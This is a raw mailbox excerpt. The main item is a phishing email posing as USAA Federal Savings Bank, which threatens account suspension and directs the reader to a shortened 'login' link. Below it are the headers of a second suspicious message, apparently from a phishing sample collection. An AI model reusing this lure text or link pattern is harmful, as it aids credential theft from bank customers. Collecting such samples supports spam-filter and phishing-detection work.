X-RIT-Received-From: 213.240.184.194 svo7321@smtp-server.rit.edu
Status: O
X-Status: 
X-Keywords:                  
X-UID: 217

You will not see this in a MIME-aware mail reader.
--===============1848110216==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body



Attention: jose@monkey.org, =

 We notice something unusual with your USAA personal details. in other for =
us to continue protect

your account from unauthorized user help us update your USAA profile immedi=
ately
 You need to update your registration attached to this mail.
 Failure to update your account will lead to suspension of your USAA accoun=
t. =

 =

 We want to confirm your details from you before De-activating your account=
 today.
 	 =

  =

 =

     =

 USAA is doing this verification update for your own security purpose only.

Thank you,
USAA Federal Savings Bank


--===============1848110216==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HEAD><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso=
-8859-1"/>
<TITLE>USAA | Login | Tracking</TITLE>
<META name=3DGENERATOR content=3D"MSHTML 10.00.9200.21811">
</HEAD>
<BODY><IMG src=3D"https://content.usaa.com/mcontent/static_assets/Media/ema=
il_logo.gif" width=3D200><BR><BR><FONT size=3D4 face=3Dveranda><B>Attention=
: jose@monkey.org,</B> <BR>
<P>We notice something unusual with your USAA personal details. in other fo=
r us to continue protect<BR><BR>your account from unauthorized user help us=
 update your USAA profile immediately</P>
You need to update your registration attached to this mail.<BR>
Failure to update your account will lead to suspension of your USAA account=
. <BR>

<br />
			We want to confirm your details from you before De-activating your accou=
nt today.</p>
			</td>
  </p>

									<p>&nbsp;</p>

									<p><a href=3D"http://bit.do/b2nGj"><img alt=3D"login" height=3D"37=
" src=3D"http://egjw24c8obi17kvuo32uvfjl.wpengine.netdna-cdn.com/wp-content=
/uploads/2014/01/Click-Here-Blue.gif" width=3D"153" /></a></p>
									=

<tr>
			<td height=3D"25" style=3D"font-family: 'Segoe UI'; margin: 0px; padding=
: 2px 0px 0px; font-size: 12px; color: rgb(42, 42, 42);">
			<p><strong>

<P>&nbsp;</P>
<P>USAA is doing this verification update for your own security purpose onl=
y.<BR><BR>Thank you,<BR>USAA Federal Savings Bank<BR></P></FONT></BODY>
--===============1848110216==--

From jose@monkey.org Mon May 16 16:39:11 2016 +0000
Return-Path: loooooooooooo@cppp.com
Delivered-To: jose@monkey.org
X-FDA: 71521465302.08.song75_6d4fec46e3542
X-Spam-Summary: 2,0,0,d41d8cd98f00b204,d41d8cd98f00b204,loooooooooooo@cppp.com,:loooooooooooo@cppp.com,RULES_HIT:41:355:379:871:988:989:1260:1313:1314:1345:1381:1516:1518:1522:1536:1575:1594:1692:1711:1730:1747:1764:1777:1792:2392:2393:2559:2562:3138:3139:3140:3141:3142:3876:3877:5007:6114:6261:6264:6642:6687:6748:7281:7398:7652:7801:10004:10400:11604:11658:11914:12340:12561:13439:14129:14516:21080:21212:30001:30026:30054:30055,0,RBL:64.8.71.19:@cppp.com:.lbl8.mailshell.net-62.8.0.100 66.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:11,LUA_SUMMARY:none
X-HE-Tag: song75_6d4fec46e3542
X-Filterd-Recvd-Size: 304393
Received: from smtp.fuse.net (smtpout-fo.fuse.net [64.8.71.19])
	by imf15.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 16 May 2016 16:39:10 +0000 (UTC)
Return-Path: <loooooooooooo@cppp.com>
X_CMAE_Category: , ,
X-CNFS-Analysis: v=2.2 cv=JPp5iICb c=1 sm=1 tr=0 a=W3armwGMo+UPR3uCCcxqAQ==:117 a=W3armwGMo+UPR3uCCcxqAQ==:17 a=KXl77lDgDEgIEtoqJYcA:9 a=tclcd6dtLQvEqt9_mmAA:9 a=x4WSvPivEpaap3dwhEUA:9 a=n3BslyFRqc0A:10
X-CM-Score: 0
X-Scanned-by: Cloudmark Authority Engine
X-Authed-Username: bG9vb29vb29vb29vb0BjcHBwLmNvbQ==
X_CMAE_Category: , ,
X-CNFS-Analysis: 
X-CM-Score: 
X-Scanned-by: Cloudmark Authority Engine
Received: from [72.49.230.24] ([72.49.230.24:51780] helo=SERVER2.main.local)
	by smtpout.cincibell.syn-alias.com (envelope-from <loooooooooooo@cppp.com>)
	(ecelerity 3.6.2.43620 r(Platform:3.6.2.0)) with ESMTP
	id AF/23-00976-9A7F9375; Mon, 16 May 2016 12:39:09 -0400
Content-Type: multipart/mixed; boundary="===============1345557261=="
Message-ID: <AF.23.00976.9A7F9375@smtp01.cbt.cmh.synacor.com>
MIME-Version: 1.0
Subject: E-payment Alert on Your Account
To: Recipients <loooooooooooo@cppp.com>
